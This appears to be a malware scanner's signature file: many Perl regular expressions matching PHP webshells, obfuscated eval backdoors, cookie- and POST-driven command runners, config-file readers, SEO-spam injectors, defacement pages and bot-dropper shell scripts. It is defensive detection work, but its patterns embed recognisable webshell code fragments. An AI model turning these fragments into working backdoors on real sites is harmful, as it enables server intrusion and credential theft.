qr/<\?php\s+\@\'\$.+?x7\=http\:\/\/.+?\.php\s+cache=.+?\(\)\;\Z/is,
qr/<\?php\s+set\_magic\_quotes\_runtime\(0\)\;\s+if\(strtolower\(substr\(PHP\_OS\,0\,3\)\).+?Command\s+completed<\/b><\/center>\"\;\s+\}\s+exit\;\s+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}.+?\"\)\{return\s+preg\_match\(\"\/\(google\.co\.jp\|yahoo\.co\.jp\|bing\)\/.+?return\s+\$([A-z0-9]{1,20})\;\}\Z/is,
qr/<\?if\(\$\_GET\[\'mod\'\]\)\{if\(\$\_GET\[.+?file\_get\_contents\(\'http\:\/\/.+?gethostbyname.+?dbl\.spamhaus\.org\'\)\;.+?\?>/is,
qr/<\?php.+?die\(\"test\s+success\"\)\;.+?exit\;\s+\}\s+\?>/is,
qr/error\_reporting\(0\)\;\s+\$query.+?\'Googlebot\'\)\s+\!\=\=\s+false\)\{.+?return\s+\$file\_contents\;\s+\}/is,
qr/a\:4\:\{s\:1\:.+?RewriteEngine.+?<\/IfModule>\"\;\}/is,
qr/<\?php.+?if\(isset\(\$\_COOKIE\[.+?array\(.+?implode\(.+?\;\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'.+?if\(isset\(\$\{\$([A-z0-9]{1,20})\[([0-9]{1,5})\]\.\$.+?\.\$([A-z0-9]{1,20})\[([0-9]{1,5})\]\]\)\;\}\s+\?>/is,
qr/<\?php.+?str\_ireplace\(\"i\"\,\"\"\,\"iibiasiieii6iii4iiii\_iideicioidieii\"\).+?\?>/is,
qr/<\?php\s+preg\_replace\(\"\/([A-z0-9]{1,20})\/e\"\,\s+\"ev\"\.\"al\(\'\"\.\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\.\"\'\)\"\,\s+\"([A-z0-9]{1,20})\s+([A-z0-9]{1,20})\"\)\;\s+\?>/is,
qr/<\?\s+error\_reporting\(0\)\;\s+set\_time\_limit\(0\)\;\s+\$a\=\$\_COOKIE\[\'a\'\].+?\$unkhost\=.+?die\(\)\;\}\s+\?>/is,
qr/<\?php\s+\$cookey\s+\=\s+\"([A-z0-9]{1,20})\"\;create\_function\(.+?\)\;\s+\?>/is,
qr/<\?php.+?\/\/\s+OS\s+system\.\s+function\s=a.+?array\_map\s+\(\'a\'\,\s+array\s+\(\$\_POST\[\'f\'\].+?\;\Z/is,
qr/<\?php\s+\/\/header.+?\$MaxQuantity\=\$\_REQUEST\[\'MaxQuantity\'\]\;.+?mkdir\(\$path\,\s+0777\)\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\$\{.+?\=getIp\(\).+?exit\(\)\;\}function\s+http\_request\(\$params\)\{\$\{.+?\=explode\(.+?\}\;\}\s+\?>/is,
qr/<\?php\s+\$wp\_\_wp\=\'base\'\.\(32\*2\)\.\'\_de\'\.\'code\'\;\$wp\_\_wp\=\$wp\_\_wp\(str\_replace\(.+?\(isset\(\$\_COOKIE\[\'wp\_wp\'\]\).+?<\/form>/is,
qr/<\?php\s+\$\{\"GLO.+?\]\;exit\(\)\;\}error\_404\(\)\;function\s+is\_good\_ip\(\$ip\)\{\$\{.+?\}\)\;\}else\s+return\s+FALSE\;if\(\$\{\$\{\"GL.+?\?>/is,
qr/\}\s+\}\s+\@ini\_set.+?WSO\_VERSION.+?call\_user\_func\(\'action\'\s+\.\s+\$\_POST\[\'a\'\]\)\;\s+exit\;/is,
qr/\}\s+\}\s+\@ini\_set.+?WSO\_VERSION.+?exit\;\s+\?>/is,
qr/<\?php\s+header\(\"Content\-type.+?\@system\(\"killall\s+\-9\s+\"\.basename\(\"\/usr\/bin\/host\"\)\)\;.+?\@system\(\"\.\/1\.sh\"\)\;\s+\?>/is,
qr/<\?php\s+\$\{\"G.+?\=getUseragent\(\).+?\=str\_replace\(.+?\]\}\;\}\s+\?>/is,
qr/<\?php\s+\$s\=\@\$\_GET\[2\]\;if\(md5\(\$s\.\$s\)\=\=\"([A-z0-9]{1,32})\"\s+\&\&\s+\(\$p\=\'pr\'\.\'eg\_\'\.\'re\'\.\'place\'\)\s+\&\&\s+\(\$r\=\'str\'\.\'\_rot\'\.\'13\'\)\)\{\$p\(\'\/ad\/\'\.\'e\'\,\'\@\'\.\$r\(\'r\'\.\'in\'\.\'y\'\)\.\'\(\$\_POST\[\$s\]\)\'\,\'add\'\)\;\}\;echo\s+dirname\(\_\_FILE\_\_\)\;\?>/is,
qr/\#\!\/bin\/sh\s+cd.+?libworker\.so.+?exit\s+0/is,
qr/<\?php\s+\/\/\s+NEXT\s+LINE.+?function\s+xor\_enc2\(\$str\).+?\;\?>/is,
qr/\#\!\/bin\/bash\s+DIRNAME\=\'\.gohome\'.+?bot\_works\(\)\s+\{.+?echo\s+\'done\'\;/is,
qr/\#\!\/bin\/sh\s+DIRNAME\=\'\.jshome\'.+?if\s+\[\s+\$\{MACHINE\_TYPE\}\s+\=\=\s+\'x86\_64\'\s+\]\;\s+then.+?echo\s+\'done\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?strlen\s+\(\$([A-z0-9]{1,20})\)\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\).+?\$([A-z0-9]{1,20})\=array\(\)\;\s+foreach\(\$\_SERVER\s+as\s+\$([A-z0-9]{1,20}).+?if\(\!empty\(\$this\->([A-z0-9]{1,20})\)\)return\s+\$this\->([A-z0-9]{1,20})\;\s+return\s+false\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"ass\"\.\"ert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\s+echo\s+([0-9]{1,20})\+([0-9]{1,20})\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\=str\_replace\(\"\[t1\]\"\,.+?include\(\"temp1\-1\.php\"\)\;\s+fclose\(\$([A-z0-9]{1,20})\)\;\s+\$([A-z0-9]{1,20})\=fopen\(\"temp1\-1\.php\"\,\"w\"\)\;\s+fclose\(\$([A-z0-9]{1,20})\)\;\s+\?>/is,
qr/<\?php\s+\@session\_start\(\)\;.+?\/\/PASSWORD\s+CONFIGURATION.+?\=strrev\(\'edoced\_46esab\'\)\;\$s\=gzinflate\(\$.+?\)\;create\_function\(\'\'\,\"\}\$s\/\/\"\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?implode\(array\_map\(.+?\-1\;\s+\?>/is,
qr/<\!DOCTYPE\s+HTML\s+PUBLIC.+?Hacked\s+By\s+Dr\.Shap7\-Nine.+?<\/html>/is,
qr/<\?php\s+\/\/([A-z0-9]{1,20})\s+\$\{.+?\}\=\=\=\"\"\|\|strrpos\(\$\{\$.+?\}\;exit\(\)\;\}\}\}\s+\/\/([A-z0-9]{1,20})\s+\?>/is,
qr/<\!DOCTYPE.+?<h1>Index\s+of\s+\/<\/h1>.+?<\/html>/is,
qr/<\?php\s+\$password\s+\=\s+\"([A-z0-9]{1,20})\".+?function\s+TestWriteable\(\).+?HtmlFoot\(\)\;\s+exit\;\s+\}\s+\?>/is,
qr/<\?php\s+header\(\"Location\:\s+http\:\/\/.+?\"\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;.+?\}\s+\?>/is,
qr/GIF89a\@\s+<\?php.+?MulCiShell.+?ob\_end\_flush\(\)\;\s+\?>/is,
qr/<\?php\s+echo\s+eval\(base64\_decode\(str\_replace\(\'\*\'\,\'a\'\,str\_replace\(\'\%\'\,\'B\'\,str\_replace\(\'\~\'\,\'F\'\,str\_replace\(\'\_\'\,\'z\'\,str\_replace\(\'\$\'\,\'x\'\,str\_replace\(\'\@\'\,\'d\'\,str\_replace\(\'\^\'\,\'3\'.+?\'\)\)\)\)\)\)\)\)\)\;/is,
qr/<\?php\s+\/\/\/\s+WebShell.+?echo\s+\"sent\_error\"\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+define\(\'TMP\'\,\'\.\/tmp\/\'\)\;\s+define\(\'BUF\'\,65536\)\;\s+define\(\'ZLEVEL\'\,9\)\;.+?header\(\"STATUS\:\s+OK\"\)\;\s+\}/is,
qr/<\?php\s+\$cfg\=.+?\)\)\{echo\s+\$goto\_body\;\}\s+\?>/is,
qr/<\!DOCTYPE.+?<title>404.+?<address>Apache\/2\.4.+?<\/html>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1})\"\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\.chr\(.+?\)\;\s+\?>/is,
qr/<\!DOCTYPE\s+html>\s+<html\s+lang\=\"en\-us\"><head><title>Hacked\s+by\s+AnoaGhost.+?<\/html>/is,
qr/GIF89a\s+BlaCkB0x\s+<\?\$k\=\"ass\"\.\"ert\"\;\s+\$k\(\$\{\"\_PO\"\.\"ST\"\}\s+\[\'admin1234\@\#\'\]\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\$.+?\'firoERs\".+?\]\}\(\)\;\}\s+\?>/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\s+\{.+?1337\)\;\s+else\Z/is,
qr/<html>\s+<head><title><\/title>\s+\<\/head>\s+<body>\s+<\?php\s+\/*\s+\*\s+REVISION.+?if\s+\(md5\(md5\(\$\_REQUEST\[.+?print\s+\"ERROR\:\s+7\s+UNKNOWN<br\/>.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+class\s+([A-z0-9]{1,20})\s+\{\s+public\s+function\s+\_\_construct\(\)\s+\{\s+\$([A-z0-9]{1,20})\s+\=\s+\@\$\_COOKIE\[\'([A-z0-9]{1,20})\'\]\;\s+if\s+\(\$([A-z0-9]{1,20})\)\s+\{\s+\$option\s+\=\s+\$([A-z0-9]{1,20})\s+\(\@\$\_COOKIE\[\'([A-z0-9]{1,20})\'\]\)\s+\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\s+\(\s+\@\$\_COOKIE\[\'([A-z0-9]{1,20})\'\]\)\s+\;\s+\$option\s+\(\s+\"\/([A-z0-9]{1,20})\/e\"\s+\,\s+\$([A-z0-9]{1,20})\s+\,\s+([A-z0-9]{1,20})\s+\)\s+\;\s+\}\s+else\s+\{\s+header\(\"HTTP\/1\.0\s+404\s+Not\s+Found\"\)\;\s+\}\s+\}\s+\}\s+\$content\s+\=\s+new\s+([A-z0-9]{1,20})\;/is,
qr/<\?php\s+\$a\=\$\_POST\[\'c\'\]\;\@EvAl\s+\(\$a\)\;\?>/is,
qr/<\?\s+if\(\$\_GET\[\"([A-z0-9]{1,20})\"\]\=\=\"([A-z0-9]{1,20})\"\)\{\s+function\s+getDir\(\$dir\)\s+\{\s+\$dirArray\[\]\=NULL\;.+?<\/label>\s+<\/form>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$file_name.+?function\s+getDirContents\(\$dir\)\s+\{.+?getDirContents\(\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\)\;\s+\}\}\s+\}\s+\}\s+\}\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+if\s+\(\s+\$\_REQUEST\[\"array\"\]\s+\)\s+\{\s+\@assert\(base64\_decode\(\$\_REQUEST\[\"array\"\]\)\)\;\s+\/\/debug\s+message\s+echo\s+\"Array\s+sort\s+completed\"\;\s+exit\(\)\;\s+\}\s+echo\'\s+PAGE\s+NOT\s+FOUND\'\;\s+\}\s+\?>/is,
qr/<\?php\s+set\_time\_limit\(0\)\;\s+ignore\_user\_abort\(\)\;.+?echo\s+\$mail\.\"\s+\-\s+sending\s+ok.+?\}\s+\}\s+\?>/is,
qr/\/\/installbg\s+\$rifilename\=\'\/home\/([A-z0-9]{1,20})\/public\_html\/.+?\'\;\s+require\(\"\$rifilename\"\)\;\s+\/\/installend/is,
qr/\;\(function\(\)\{var\s+k\=navigator\[b\(\"st\{n\(e4g9A2r\,exs\,u8\"\)\]\;var\s+s\=document\[b\(\"je\,i\{kaofo6c.+?async\=true\;w\.src\=.+?length\-1\;v>\=0\;v\-\-\)\{n\+\=y\[v\]\;\}return\s+n\;\}\}\)\(\)\;/is,
qr/<\?php\s+\$user\_agent\_to\_filter\s+\=\s+array\(.+?if\(\@\$isbot\)\{.+?echo\s+\$result\;\s+\}\s+\?>/is,
qr/<\?php\s+\$key\s+\=\'([A-z0-9]{1,20})\'\;\s+\$key\s+\.\=.+?eval\(\$b\(\$new\)\)\;\s+\?>/is,
qr/<\?php\s+\/\*\s+\(c\)\s+2011\s+The\s+potion\s+hissed.+?\=base64\_decode\(.+?\=\@gzinflate\(strrev\(.+?\=create\_function\(.+?\}\s+\?>/is,
qr/<\?php\s+\/\*\s+\(c\)\s+2004.+?base64\_decode\(.+?gzinflate\(strrev\(.+?if\(crc32\(.+?create\_function.+?\}\s+\?>/is,
qr/<\?php\s+if\(\s+isset\(\$\_REQUEST\[\"test\_url\"\]\)\s+\)\{\s+echo\s+\"file\s+test\s+okay\"\;.+?\$data\s+\=\s+base64\_decode\(.+?die\(\"([0-9]{1,20})\"\)\;\s+\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'xftest\'\]\)\)die\(pi\(\)\*6\)\;.+?\}else\{echo\s+\"false\"\;\}\s+\}\s+\?>/is,
qr/<\?php\s+\$scriptname\=\s+str\_replace\(.+?if\s+\(file\_exists\(\"wp\-content\"\)\).+?unlink\(\$scriptname\)\;\s+\?>/is,
qr/<\?php.+?Twenty\_Sixteen.+?eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php.+?str\_ireplace\(\"([A-z0-9]{1})\"\,\"\"\,\"([A-z]{1,10})b([A-z]{1,10})a([A-z]{1,10})s([A-z]{1,10})e([A-z]{1,10})6([A-z]{1,10})4([A-z]{1,10})\_([A-z]{1,10})d([A-z]{1,10})e([A-z]{1,10})c([A-z]{1,10})o([A-z]{1,10})d([A-z]{1,10})e([A-z]{1,10})\"\).+?}\s+\?>/is,
qr/<\?php\s+error\_reporting\(E\_ERROR.+?\$wp\_code\s+\=.+?\?>/is,
qr/<\?php\s+\$s\_pass\s+\=\s+\"\"\;\s+eval\(\"\W\$x\=gzin\"\.\"flate\(base\"\.\"64\_de\"\.\"code\(.+?\)\)\;\"\)\;eval\(\"\?>\"\.\$x\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"cr\"\.\"eat\"\.\"e\_fun\"\.\"cti\"\.\"on\"\;\$([A-z0-9]{1,20})\=\@\$([A-z0-9]{1,20})\(\'\$([A-z0-9]{1,20})\'\,\'ev\'\.\'al\'\.\'\(\"\?>\"\.gz\'\.\'inf\'\.\'late\'\.\'\(\s+bas\'\.\'e64\'\.\'\_de\'\.\'co\'\.\'de\(\$([A-z0-9]{1,20})\)\)\)\;\'\)\;\@\$([A-z0-9]{1,20}).+?\)\;/is,
qr/<\?php\s+\@eval\(\$\_POST\[\".+?\"\]\)\;\?>/is,
qr/if\(isset\(\$\_REQUEST\[\'sort\'\]\)\)\{\s+\$string\s+\=\s+\$\_REQUEST\[\'sort\'\]\;\s+\$array\_name\s+\=\s+\'\'\;\s+\$alphabet.+?\$ar\s+\=\s+array\(.+?foreach\(\$ar\s+as\s+\$t\)\{\s+\$array\_name\s+\.\=\s+\$alphabet\[\$t\]\;\s+\}\s+\$a\s+\=\s+strrev\(.+?\$f\s+\=\s+\$a\(\"\"\,\s+\$array\_name\(\$string\)\)\;\s+\$f\(\)\;\s+exit\(\)\;\s+\}/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+set\_time\_limit\(0\)\;.+?class\s+O\s+\{\s+private\s+\$content\_\s+\=.+?execute\(\)\;/is,
qr/<\?php.+?\$([A-z0-9]{1,20})\=str\_ireplace\(.+?define\(\'([A-z0-9]{1,20})\'\,\s+\_\_DIR\_\_\)\;.+?\?>/is,
qr/<\?php.+?error\_reporting\(([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\=\!preg\_match\(\'\~\^\(unsafe\_raw\)\?\$\~\'\,ini\_get\(\"filter\.default\"\)\)\;if\(\$([A-z0-9]{1,20})\|\|ini\_get\(\"filter\.default\_flags\"\)\)\{foreach\(array\(\'\_GET\'\,\'\_POST\'\,\'\_COOKIE\'\,\'\_SERVER\'\).+?lzw\_decompress\(.+?/is,
qr/<\?php\s+\$suc\s+\=\s+false\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\s+\.\s+\'\/wp\-config\.php\'\;.+?\$([A-z0-9]{1,20})\s+\=\s+\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\s+\.\s+\'\/configuration\.php\'\;.+?if\(\$suc\s+\!\=\s+true\)\s+\{\s+echo\s+\'Not\s+found\s+file\'\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\s+function\s+([A-z0-9]{1,20})\s+\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\s+\{\s+return\s+\$([A-z0-9]{1,20})\s+\^\s+str\_repeat\s+\(\$([A-z0-9]{1,20})\,\s+ceil\s+\(strlen\s+\(\$([A-z0-9]{1,20})\)\s+\/\s+strlen\s+\(\$([A-z0-9]{1,20})\)\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$c\=base64\_decode\(\'.+?\=\'\)\.\$\_GET\[n\]\.\'t\'\;\@\$c\(\$\_POST\[x\]\)\;\?>abcabcabc/is,
qr/<\?php\s+\(\$sun\s+\=\s+\$\_POST\[\'nnd\'\]\)\s+\&\&\s+\@preg\_replace\(\'\/ad\/e\'\,\'\@\'\.str\_rot13\(\'riny\'\)\.\'\(\$sun\)\'\,\s+\'add\'\)\;\?>lslfjsdlfkjsdjlfSDFlfjp7934937kdjfhshdofowe\@\#\$\#\$\%\$\&\*\^\&\*\#\$\%\#\$\%\#\@\$\#\%jkdfhghgiernqnwv\_\+\&\%\$\&\#\^\%\*\(QVRJLQWERLQWWER\$\%\%\&\%\&\@\%\#\$\%\^\%\&\^\&\*\*\&\(\)\(\)\%\@\$\!\#\%\%/is,
qr/<\?php\s+\$\{.+?\)\)\{\@ob\_clean\(\)\;echo\s+base64\_decode\(substr\(\$\{\$\{.+?\]\}\;\}break\;\}\}\}\}\}\s+\?>/is,
qr/<\?php\s+\(\$sun\s+\=\s+\$\_POST\[\'\#\#\#\'\]\)\s+\&\&\s+\@preg\_replace\(\'\/ad\/e\'\,\'\@\'\.str\_rot13\(\'riny\'\)\.\'\(\$sun\)\'\,\s+\'add\'\)\;\?>/is,
qr/<\?php\s+\/\/header\(\'Content\-Type\:text\/html\;\s+charset\=utf\-8\'\)\;\s+\$O\_0OO\_\_0O0\=.+?\$O\_OO0\_O0\_0\=urldecode\(.+?\$OOO0O0\_0\_\_\)\;exit\(\)\;\}\'\)\;\$\{.+?\]\(\)\;\?>/is,
qr/<\?php\s+\$\_\_\_\_\=base64\_decode\(.+?<input\s+type\=\"submit\"\s+value\=\"go\"\/><\/form><\/center>\'\)\;\?>/is,
qr/<\?php\s+error\_reporting\(E\_ALL\s+\&\s+\~E\_NOTICE\)\;\s+\$m\s+\=\s+get\_magic\_quotes\_gpc\(\)\;\s+\$uploadfloder.+?\}\s+else\s+\{\s+echo\s+\"ok\"\;\s+\}\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$domain\s+\=\s+\'n\.liveupdates\.host\'\;.+?\$s\s+\=\s+dns\_get\_record\(\$domain\,\s+DNS\_TXT\)\;.+?header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$m\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/<\?php\s+function\s+result\(\$data\).+?srand\(seed\(\)\)\;.+?echo\(result\(array\(.+?\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'xftest\'\]\)\)die\(pi\(\)\*.+?\]\)\;\}exit\(\)\;\}/is,
qr/<\?php\s+\/\/header\(\'Content\-Type\:text\/html\;\s+charset\=utf\-8\'\)\;\s+\$O\_OO\_\_000O\=\'1044\'\;\s+\$O0O00OO\_\_\_\=urldecode\(.+?\]\(\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\=str\_rot13\(\'([A-z0-9]{1,20})\_([A-z0-9]{1,20})\'\)\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\'([A-z0-9]{1,20})64\_([A-z0-9]{1,20})\'\)\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\'([A-z0-9]{1,20})\'\)\;\$a\=\'rt\'\;\s+\$b\=\'as\'\;\s+\$b\.\=\'se\'\s+\.\s+\$a\;\@\$b\(\$([A-z0-9]{1,20})\(\'ri\'\s+\.\s+\'ny\(\W'\'\s+\.\s+\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\s+\.\s+\'\\'\)\'\)\)\;/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\s+\{\s+\$([A-z0-9]{1,20})\=base64\_decode\(\$([A-z0-9]{1,20})\)\;.+?if\(\$([A-z0-9]{1,20})\=\=strlen\(\$([A-z0-9]{1,20})\)\)\s+break\;\s+elseif\(.+?\$([A-z0-9]{1,20})\=\(ord\(.+?if\(\!empty\(\$this\->([A-z0-9]{1,20})\)\)return\s+\$this\->([A-z0-9]{1,20})\;\s+return\s+false\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\@set\_time\_limit\(0\)\;\s+\@ini\_set\(\'display\_errors\'\,\s+1\)\;.+?if\(\!function\_exists\(\'file\_put\_contents\'\)\)\s+\{.+?if\(isset\(\$\_GET\[\"rdir\"\]\)\&\&\s+\$\_GET\[\"url\"\]\)\{.+?function\s+curl\_get\_from\_webpage\_one\_time\(\$url\,\$proxy\=\'\'\,\$tms\=0\)\{.+?unlink\(\"\.\/wp\-content\/uploader\.php\"\)\;\s+\?>/is,
qr/<\?php.+?Joomla\.Administrator.+?define\(\'\_JEXEC\'\,\s+\'([A-z0-9]{250,})\'\)\;\s+defined\(\'\_JEXEC\'\)\s+or\s+die\;.+?echo\s+\'<form\s+method\=\"post\"\s+action\=\"\">\s+<input\s+type\=\"input\"\s+name\=\s+\"j\_submenu\"\s+value\=\"\"\/><input\s+type\=\"submit\"value\=\"\&gt\;\"\/>\s+<\/form>\'\;\s+\?>/is,
qr/<\?php\s+\@ini\_set\(\'display\_errors\'\,\s+0\)\;.+?\$arr\_word\[0\]\[\].+?\$arrKeywz\[\].+?\$strRand\[0\].+?str\_ireplace\(str\_replace\(.+?\/\/file\s+end/is,
qr/<\?php\s+\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\s+\#\s+Xai\s+Syndicate\s+\#\s+\#NoName\s+Shell\s+Release\#\s+\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\s+\$auth\_pass\s+\=.+?eval\(str\_rot13\(gzinflate\(str\_rot13\(base64\_decode\(\(\$noname\)\)\)\)\)\)\;/is,
qr/<\?php\s+echo\s+\"Priv8\s+Home\s+Root\s+Uploader.+?echo\s+\"gagal\s+upload\"\;\s+\}\s+\}\s+\}\s+\?>/is,
qr/<\?php.+?BlackHat\s+Shell.+?\$auth\_pass.+?\$nusantarablackhat.+?eval\(str\_rot13\(gzinflate\(str\_rot13\(base64\_decode\(\(\$nusantarablackhat\)\)\)\)\)\)\;/is,
qr/<\!DOCTYPE\s+html>\s+<head>\s+<\!\-\-\s+Meta\s+\-\->\s+<meta\s+name\=\"keywords\"\s+content\=\"Hacked\">.+?<\!\-\-\s+end\:\s+index\s+\-\->/is,
qr/<html>\s+<head>\s+<title>\?\?\?\!\!\!<\/title>.+?<h1>\s+HACKED\s+BY\s+CYBERSCRY\s+<\/h1>.+?\/font><\/marquee><br><br><br>/is,
qr/<\?php\s+\/\/silent\s+is\s+gold\s+eval\(str\_rot13\(gzinflate\(str\_rot13\(base64\_decode\(.+?\)\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\/\/silent\s+is\s+gold\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;/is,
qr/<\?php\s+\/\*\s+PHP\s+Encryption\s+By\s+FathurFreakz.+?\(substr\(file\_get\_contents\(\_\_file\_\_\)\,([0-9]{1,10})\,strlen\(file\_get\_contents\(\_\_file\_\_\)\)\)\)\)\;\_\_halt\_compiler\(\)\;\s+\@FathurFreakz.+?\/([A-z0-9]{1,20})/is,
qr/<\?php\s+if\(\!class\_exists\(\'OneG\'\)\)\{if\(function\_exists\(\'is\_user\_logged\_in\'\)\).+?return\s+\$content\;\}\}\$ratel\=new\s+OneG\;\$ratel\->init\(\$uri\,\$ua\)\;\}/is,
qr/<\!DOCTYPE\s+HTML\s+PUBLIC.+?<title>\:\:\s+ByPass.+?\$file\s+\=\s+fopen\(\"config\.izo\"\s+\,\"w\+\"\)\;.+?<\/html>/is,
qr/<\?php\s+\/\*\*\s+Copyright\s+\©\s+2007.+?\*\/\s+eval\(gzuncompress\(base64\_decode\(.+?\)\)\)\;/is,
qr/<\?php\s+\$auth\_pass\s+\=.+?\$default\_action.+?\$default\_use\_ajax.+?\$default\_charset.+?\)\)\;\s+return\;\s+\?>/is,
qr/<\?php\s+if\s+\(\s+md5\(getenv\(\'HTTP\_USER\_AGENT\'\)\)\s+\!\=.+?\$dflt\_actn\s+\=\s+\'FilesWin\'\;.+?\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;.+?function\s+scan\_dir\(\$dirname\)\{.+?if\s+\(\!function\_exists\(\'file\_put\_contents\'\)\)\s+\{.+?if\s+\(isset\(\$\_POST\[\'startreplace\'\]\)\)\{.+?\s+echo\s+\'Finish\!\s+Dir\:\s+\'\.\$dir\.\'\s+Replace\:\s+\'\s+\.\s+\$repl\s+\.\s+\'\s+Files\:\s+\'\.\s+\$coun\;\s+\}\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\s+\#\s+mod\_add\_custom\_css.+?if\s+\(\s+md5\(getenv\(\'HTTP\_USER\_AGENT\'\)\)\s+\=\=.+?eval\(\$data\_row\->htmlcode\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\s+\#\s+mod\_add\_custom\_css.+?define\(\'AKISMET\_VERSION\'\,\s+\'2\.2\.6\'\)\;.+?\$dflt\_actn\s+\=\s+\'FilesMan\'\;.+?<input\s+type\=hidden\s+name\=charset>\s+<\/form>/is,
qr/<\?php\s+\/\*\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\s+\#\s+mod\_add\_custom\_css.+?\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\s+\"\"\,\s+\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\s+array\(\$([A-z0-9]{1,20})\{([0-9]{1,10})\}\,\s+\"Wn\"\)\,\s+\"\"\,.+?\)\s+\)\s+\)\;\s+\$([A-z0-9]{1,20})\(\)\;\s+\?>/is,
